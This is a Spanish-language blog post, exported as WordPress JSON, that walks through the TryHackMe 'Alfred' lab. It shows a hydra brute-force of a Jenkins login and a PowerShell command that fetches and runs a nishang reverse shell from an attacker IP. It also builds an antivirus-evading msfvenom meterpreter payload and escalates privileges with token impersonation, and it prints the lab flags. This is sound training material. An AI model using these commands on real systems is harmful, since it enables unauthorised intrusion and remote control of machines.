{"id":66,"date":"2023-09-03T21:26:56","date_gmt":"2023-09-04T00:26:56","guid":{"rendered":"https:\/\/mauriciobeltran.cl\/?p=66"},"modified":"2023-09-03T21:28:15","modified_gmt":"2023-09-04T00:28:15","slug":"tryhackme-alfred-resuelto","status":"publish","type":"post","link":"https:\/\/mauriciobeltran.cl\/index.php\/2023\/09\/03\/tryhackme-alfred-resuelto\/","title":{"rendered":"TryHackMe – Alfred (resuelto)"},"content":{"rendered":"\n

Esta sala, esta pensada para vulnerar Jenkins y Windows. Analizaremos el vector de ataque y los pasos necesarios para solucionar el m\u00f3dulo Alfred en TryHackMe.<\/p>\n\n\n\n

Vector de ataque<\/h2>\n\n\n\n
    \n
  1. Preparacion<\/li>\n\n\n\n
  2. Acceso inicial<\/li>\n\n\n\n
  3. Cambiar shells<\/li>\n\n\n\n
  4. Escalar privilegios<\/li>\n<\/ol>\n\n\n\n

    0. Preparaci\u00f3n<\/h2>\n\n\n\n

    Llame a esta etapa 0, porque necesitamos descargar algunas cosas antes de ponernos manos a la obra<\/p>\n\n\n\n

    en la maquina atacante descargar nishang scripts<\/p>\n\n\n

    \ngit clone https:\/\/github.com\/samratashok\/nishang.git\n\n<\/pre><\/div>\n\n\n
    servimos la ruta desde \/root<\/p>\n\n\n
    \ncd ~\npython -m http.server 8000\n\n<\/pre><\/div>\n\n\n
    En otra tab dejaremos nuestro listener ncat<\/p>\n\n\n
    \nnc -lvp 4441\n\n<\/pre><\/div>\n\n\n
    1. Acceso inicial<\/h2>\n\n\n\n
    Se nos pide escanear la maquina, y se nos dice que solo responde a TCP, entonces.<\/p>\n\n\n
    \nnmap -sT -F 10.10.202.154\n\n<\/pre><\/div>\n\n
    \nStarting Nmap 7.60 ( https:\/\/nmap.org ) at 2023-09-03 15:05 BST\nNmap scan report for ip-10-10-202-154.eu-west-1.compute.internal (10.10.202.154)\nHost is up (0.00018s latency).\nNot shown: 97 filtered ports\nPORT     STATE SERVICE\n80\/tcp   open  http\n3389\/tcp open  ms-wbt-server\n8080\/tcp open  http-proxy\nMAC Address: 02:30:23:0D:DD:79 (Unknown)\n\nNmap done: 1 IP address (1 host up) scanned in 2.25 seconds\n\n<\/pre><\/div>\n\n\n
    How many ports are open? (TCP only) 3<\/strong><\/p>\n\n\n\n
    Sabemos entonces que aparte del puerto 80, hay otro puerto sirviendo contenido y cargamos la pagina<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    Se nos pide vulnerar el user\/password. Sabemos que el usuario por defecto en Jenkins es admin por lo que intentaremos romper la contrase\u00f1a con ese usuario mediante ataque por diccionario usnado hydra.<\/p>\n\n\n\n
    Primero, necesitamos algunos datos antes de proseguir<\/p>\n\n\n\n
      \n
    1. url:<\/strong> http:\/\/10.10.202.154<\/a><\/li>\n\n\n\n
    2. Puerto:<\/strong> 8080<\/li>\n\n\n\n
    3. Pagina que resuelve login<\/strong>: \/j_acegi_security_check<\/li>\n\n\n\n
    4. Parametros que se envian al login:<\/strong> j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in<\/li>\n\n\n\n
    5. Mensaje de error:<\/strong> Invalid username or password<\/li>\n\n\n\n
    6. Wordlist para realizar el ataque:<\/strong> En rigor podriamos usar rockyou.txt (14.344.391 lineas), pero entendiendo que es un caso de prueba cercano a la realidad pero no real, vamos a usar una lista corta (fastrack.txt, que son 222 lineas), si no estaremos un a\u00f1o intentando romper la clave.<\/li>\n<\/ol>\n\n\n\n
      Con eso, ya podemos construir nuestro ataque.<\/p>\n\n\n
      \nhydra -l admin -P \/usr\/share\/wordlists\/fasttrack.txt 10.10.202.154 -s 8080 http-post-form "\/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -F\n\n<\/pre><\/div>\n\n
      \n[8080][http-post-form] host: 10.10.202.154   login: admin   password: admin\n[STATUS] attack finished for 10.10.202.154 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (http:\/\/www.thc.org\/thc-hydra) finished at 2023-09-03 15:19:21\n\n<\/pre><\/div>\n\n\n
      What is the username and password for the login panel? (in the format username:password) admin:admin<\/strong><\/p>\n\n\n\n
      Con esto ya podemos acceder a Jenkins.<\/p>\n\n\n\n
      Una vez dentro nos encontraremos con que tiene un job creado que tiene el comando whoami, usaremos esto para proseguir con el ataque.<\/p>\n\n\n\n
      En el job, modificaremos el whoami por lo siguiente<\/p>\n\n\n
      \npowershell iex (New-Object Net.WebClient).DownloadString('http:\/\/10.10.61.217:8000\/nishang\/Shells\/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.61.217 -Port 4441\n\n<\/pre><\/div>\n\n\n
      Ejecutando el job veremos que en nuestro listener ncat se levanta la shell windows.<\/p>\n\n\n
      \nListening on [0.0.0.0] (family 0, port 4441)\nConnection from ip-10-10-202-154.eu-west-1.compute.internal 49236 received!\nWindows PowerShell running as user bruce on ALFRED\nCopyright (C) 2015 Microsoft Corporation. All rights reserved.\n\nPS C:\\Program Files (x86)\\Jenkins\\workspace\\project>\n\n<\/pre><\/div>\n\n\n
      Ok, necesitamos saber quienes somos<\/p>\n\n\n
      \nwhoami\nalfred\/bruce\n\n<\/pre><\/div>\n\n\n
      Buscando que usuarios hay en Users nos percatamos que existe un usuario bruce<\/p>\n\n\n
      \ndir C:\\Users\nDirectory: C:\\Users\n\n\nMode                LastWriteTime     Length Name                              \n----                -------------     ------ ----                              \nd----        10\/25\/2019   8:05 PM            bruce                             \nd----        10\/25\/2019  10:21 PM            DefaultAppPool                    \nd-r--        11\/21\/2010   7:16 AM            Public \n\n<\/pre><\/div>\n\n\n
      Veamos si podemos encontrar el archivo que se nos solicita<\/p>\n\n\n
      \ndir C:\\Users\\bruce\\Desktop\nDirectory: C:\\Users\\bruce\\Desktop\n\n\nMode                LastWriteTime     Length Name                              \n----                -------------     ------ ----                              \n-a---        10\/25\/2019  11:22 PM         32 user.txt \n\n\n<\/pre><\/div>\n\n
      \ntype C:\\Users\\bruce\\Desktop\\user.txt\n\n<\/pre><\/div>\n\n\n
      What is the user.txt flag? 79007a09481963edf2e1321abd9ae2a0<\/strong><\/p>\n\n\n\n
      2. Cambiar shells<\/h2>\n\n\n\n
      En esta secci\u00f3n se nos pide que lo hagamos por metasploit, para tener una shell mas avanzada.<\/p>\n\n\n\n
      Creamos un payload, la idea de usar un encoder es evadir deteccion de antivirus de firmas conocidas.<\/p>\n\n\n
      \nmsfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.10.61.217 LPORT=4444 -f exe -o payload.exe\n\n<\/pre><\/div>\n\n\n
      En Jenkins, subimos nuestro payload, ejecutando en el Job lo siguiente:<\/p>\n\n\n
      \npowershell "(New-Object System.Net.WebClient).Downloadfile('http:\/\/10.10.61.217:8000\/payload.exe','payload.exe')"\n\n\n<\/pre><\/div>\n\n\n
      En metasploit, usamos un multi\/handler para dejar en modo escucha conexiones entrantes<\/p>\n\n\n
      \nuse exploit\/multi\/handler \nuse PAYLOAD windows\/meterpreter\/reverse_tcp \nset LHOST 10.10.61.217\nset LPORT 4444\nrun\n\n\n<\/pre><\/div>\n\n\n
      Nuevamente en Jenkins, ejecutemos el payload de la siguiente manera<\/p>\n\n\n
      \ncall payload.exe\n\n<\/pre><\/div>\n\n\n
      Eso levantar\u00e1 un meterpreter en metasploit.<\/p>\n\n\n
      \n[-] Handler failed to bind to 10.10.202.154:4444:-  -\n[*] Started reverse TCP handler on 0.0.0.0:4444 \n[*] Sending stage (175686 bytes) to 10.10.202.154\n[*] Meterpreter session 1 opened (10.10.202.154:4444 -> 10.10.202.154:49195) at 2023-09-04 01:03:20 +0100\n\nmeterpreter > \n\n<\/pre><\/div>\n\n\n
      What is the final size of the exe payload that you generated? 73802<\/strong><\/p>\n\n\n\n
      3. Escalar privilegios<\/h2>\n\n\n\n
      Ya estamos dentro, veamos que permisos tenemos<\/p>\n\n\n
      \nshell\n\n<\/pre><\/div>\n\n
      \nC:\\Program Files (x86)\\Jenkins\\workspace\\project>whoami \/priv\nwhoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                  Description                               State   \n=============================== ========================================= ========\nSeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled\nSeSecurityPrivilege             Manage auditing and security log          Disabled\nSeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled\nSeLoadDriverPrivilege           Load and unload device drivers            Disabled\nSeSystemProfilePrivilege        Profile system performance                Disabled\nSeSystemtimePrivilege           Change the system time                    Disabled\nSeProfileSingleProcessPrivilege Profile single process                    Disabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled\nSeCreatePagefilePrivilege       Create a pagefile                         Disabled\nSeBackupPrivilege               Back up files and directories             Disabled\nSeRestorePrivilege              Restore files and directories             Disabled\nSeShutdownPrivilege             Shut down the system                      Disabled\nSeDebugPrivilege                Debug programs                            Enabled \nSeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled\nSeChangeNotifyPrivilege         Bypass traverse checking                  Enabled \nSeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled\nSeUndockPrivilege               Remove computer from docking station      Disabled\nSeManageVolumePrivilege         Perform volume maintenance tasks          Disabled\nSeImpersonatePrivilege          Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege         Create global objects                     Enabled \nSeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled\nSeTimeZonePrivilege             Change the time zone                      Disabled\nSeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled\n\n<\/pre><\/div>\n\n\n
      hay 2 privilegios explotables habilitados (SeDebugPrivilege, SeImpersonatePrivilege)<\/p>\n\n\n\n
      En meterpreter cargamos el modulo incognito<\/p>\n\n\n
      \nload incognito\n\n<\/pre><\/div>\n\n
      \nlist_tokens -g\n\n<\/pre><\/div>\n\n
      \n[-] Warning: Not currently running as SYSTEM, not all tokens will be available\n             Call rev2self if primary process token is SYSTEM\n\nDelegation Tokens Available\n========================================\n\\\nBUILTIN\\Administrators\nBUILTIN\\Users\nNT AUTHORITY\\Authenticated Users\nNT AUTHORITY\\NTLM Authentication\nNT AUTHORITY\\SERVICE\nNT AUTHORITY\\This Organization\nNT SERVICE\\AudioEndpointBuilder\nNT SERVICE\\CertPropSvc\nNT SERVICE\\CscService\nNT SERVICE\\iphlpsvc\nNT SERVICE\\LanmanServer\nNT SERVICE\\PcaSvc\nNT SERVICE\\Schedule\nNT SERVICE\\SENS\nNT SERVICE\\SessionEnv\nNT SERVICE\\TrkWks\nNT SERVICE\\UmRdpService\nNT SERVICE\\UxSms\nNT SERVICE\\WdiSystemHost\nNT SERVICE\\Winmgmt\nNT SERVICE\\wuauserv\n\nImpersonation Tokens Available\n========================================\nNo tokens available\n\n\n<\/pre><\/div>\n\n
      \nimpersonate_token "BUILTIN\\Administrators"\n\n<\/pre><\/div>\n\n
      \n[-] Warning: Not currently running as SYSTEM, not all tokens will be available\n             Call rev2self if primary process token is SYSTEM\n[+] Delegation token available\n[+] Successfully impersonated user NT AUTHORITY\\SYSTEM\n\n\n<\/pre><\/div>\n\n
      \ngetuid\n\n<\/pre><\/div>\n\n\n
      Use the impersonate_token \u00abBUILTIN\\Administrators\u00bb command to impersonate the Administrators’ token. What is the output when you run the getuid command? NT AUTHORITY\\SYSTEM<\/strong><\/p>\n\n\n\n
      Si bien representamos a administrator, no tenemos permisos, para ello hay que migrar de proceso.<\/p>\n\n\n
      \nps\n\n<\/pre><\/div>\n\n
      \nProcess List\n============\n\n PID   PPID  Name                  Arch  Session  User                          Path\n ---   ----  ----                  ----  -------  ----                          ----\n 0     0     [System Process]\n 4     0     System                x64   0\n 396   4     smss.exe              x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\smss.exe\n 524   516   csrss.exe             x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\csrss.exe\n 572   564   csrss.exe             x64   1        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\csrss.exe\n 580   516   wininit.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\wininit.exe\n 608   564   winlogon.exe          x64   1        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\winlogon.exe\n 668   580   services.exe          x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\services.exe\n 676   580   lsass.exe             x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\lsass.exe\n 684   580   lsm.exe               x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\lsm.exe\n 712   668   sppsvc.exe            x64   0        NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\System32\\sppsvc.exe\n 772   668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 848   668   svchost.exe           x64   0        NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\System32\\svchost.exe\n 920   608   LogonUI.exe           x64   1        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\LogonUI.exe\n 936   668   svchost.exe           x64   0        NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 992   668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 1012  668   svchost.exe           x64   0        NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 1016  668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 1076  668   svchost.exe           x64   0        NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\System32\\svchost.exe\n 1216  668   spoolsv.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\spoolsv.exe\n 1244  668   svchost.exe           x64   0        NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 1348  668   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\\SYSTEM           C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\n 1432  668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 1456  668   LiteAgent.exe         x64   0        NT AUTHORITY\\SYSTEM           C:\\Program Files\\Amazon\\Xentools\\LiteAgent.exe\n 1484  668   svchost.exe           x64   0        NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 1648  668   jenkins.exe           x64   0        alfred\\bruce                  C:\\Program Files (x86)\\Jenkins\\jenkins.exe\n 1716  668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 1772  668   svchost.exe           x64   0        NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\System32\\svchost.exe\n 1820  1648  java.exe              x86   0        alfred\\bruce                  C:\\Program Files (x86)\\Jenkins\\jre\\bin\\java.exe\n 1852  668   Ec2Config.exe         x64   0        NT AUTHORITY\\SYSTEM           C:\\Program Files\\Amazon\\Ec2ConfigService\\Ec2Config.exe\n 1920  524   conhost.exe           x64   0        alfred\\bruce                  C:\\Windows\\System32\\conhost.exe\n 1940  524   conhost.exe           x64   0        alfred\\bruce                  C:\\Windows\\System32\\conhost.exe\n 2368  668   taskhost.exe          x64   0        NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\taskhost.exe\n 2384  772   WmiPrvSE.exe          x64   0        NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\System32\\wbem\\WmiPrvSE.exe\n 2576  2696  payload.exe           x86   0        alfred\\bruce                  C:\\Program Files (x86)\\Jenkins\\workspace\\project\\payload.exe\n 2696  1820  cmd.exe               x86   0        alfred\\bruce                  C:\\Windows\\SysWOW64\\cmd.exe\n 2752  668   SearchIndexer.exe     x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\SearchIndexer.exe\n 3012  668   svchost.exe           x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 3048  668   TrustedInstaller.exe  x64   0        NT AUTHORITY\\SYSTEM           C:\\Windows\\servicing\\TrustedInstaller.exe\n\n\n<\/pre><\/div>\n\n
      \nmigrate 668\n[*] Migrating from 2576 to 668...\n[*] Migration completed successfully.\n\n<\/pre><\/div>\n\n
      \ntype C:\\Windows\\System32\\config\\root.txt\n\n<\/pre><\/div>\n\n\n
      Read the root.txt file located at C:\\Windows\\System32\\config: dff0f748678f280250f25a45b8046b4a<\/strong><\/p>\n\n\n\n
      \u00a1Y ya est\u00e1!, cualquier duda me comentan.<\/p>\n","protected":false},"excerpt":{"rendered":"
      Esta sala, esta pensada para vulnerar Jenkins y Windows. Analizaremos<\/p>\n","protected":false},"author":1,"featured_media":18,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,7],"tags":[10,11,9],"class_list":["post-66","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersec","category-ethical-hacking","tag-alfred","tag-jenkins","tag-tryhackme"],"_links":{"self":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/66","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/comments?post=66"}],"version-history":[{"count":13,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/66\/revisions"}],"predecessor-version":[{"id":81,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/posts\/66\/revisions\/81"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/media\/18"}],"wp:attachment":[{"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/media?parent=66"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/categories?post=66"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mauriciobeltran.cl\/index.php\/wp-json\/wp\/v2\/tags?post=66"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}